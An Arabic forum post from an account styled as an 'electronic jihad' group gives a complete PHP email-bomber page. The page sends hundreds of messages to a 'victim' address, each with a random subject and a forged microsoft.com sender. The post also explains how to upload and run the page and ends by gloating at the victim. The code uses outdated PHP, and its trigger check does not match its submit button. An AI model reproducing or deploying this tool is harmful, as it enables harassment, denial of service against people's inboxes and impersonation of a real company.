Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: كيف تصنع برنامج ضرب ايميلات بال php


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
كيف تصنع برنامج ضرب ايميلات بال php
Permalink   
 


كيف تصنع برنامج ضرب الأيميلات بالPHP
بسي ياريت ياشباب متنسوش كتابه الردود
اولا:
افتح اي برنامج تحرير وليكن notepad ثم اكتب الكود التالي
=========================================

<HTML>
<HEAD>
<TITLE>MaSrAwY mail bomber</TITLE>
</HEAD>

<BODY>

<?
if ($action == "BOMB")
{
if (ereg("[A-Za-z0-9_-]+([\.]{1}[A-Za-z0-9_-]+)*@[A-Za-z0-9-]+([\.]{1}[A-Za-z0-9-]+)+", $to))
{
echo "Sending $messages to $to<BR><BR><BR>";
}
else
{
die("Invalid emailaddress ($to)");
}




for ($i = 1; $i <= $messages; $i++)
{

$randfrom = rand(100000,900000);
$randsubject = rand(100000,900000);

mail($to, $randsubject, "$message", "From: $randfrom@microsoft.com");
echo "Sent message # $i (Subject: $randsubject, From: $randfrom@microsoft.com<BR>";

}


}

?>



<CENTER>
<form name="mailbomber" method="post" action="<?php echo $PHP_SELF ?>">
<table width="760" border="0" cellspacing="2" cellpadding="2">
<tr>
<td>MaSrAwY MAIL BOMBER</td>
</tr>
<tr>
<td>عدد الرسائل</td>
<td>
<input type="text" name="messages" value="500">
</td>
</tr>
<tr>
<td>اميل الضحية</td>
<td>
<input type="text" name="to">
</td>
</tr>
<tr>
<td>الرسالة</td>
<td>
<textarea name="message" cols="30" rows="5"></textarea>
</td>
</tr>
<tr>
<td> </td>
<td>
<input type="submit" name="action" value="ارسل">
</td>
</tr>
</table>
</form>
</CENTER>
</BODY>
</HTML>

======================================
وبعد كده
احفظه بالامتداد php
بعد ذلك ارفع الصفحة الي موقعك (يجب ان يكون يدعم لغة php )
يمكنك بعد ذلك فتحه بالاكسبلورر ستري صفحة تضع بها عدد الرسائل
وايميل الضحية
هاهاهاهاهاها وعيش حياتك



__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard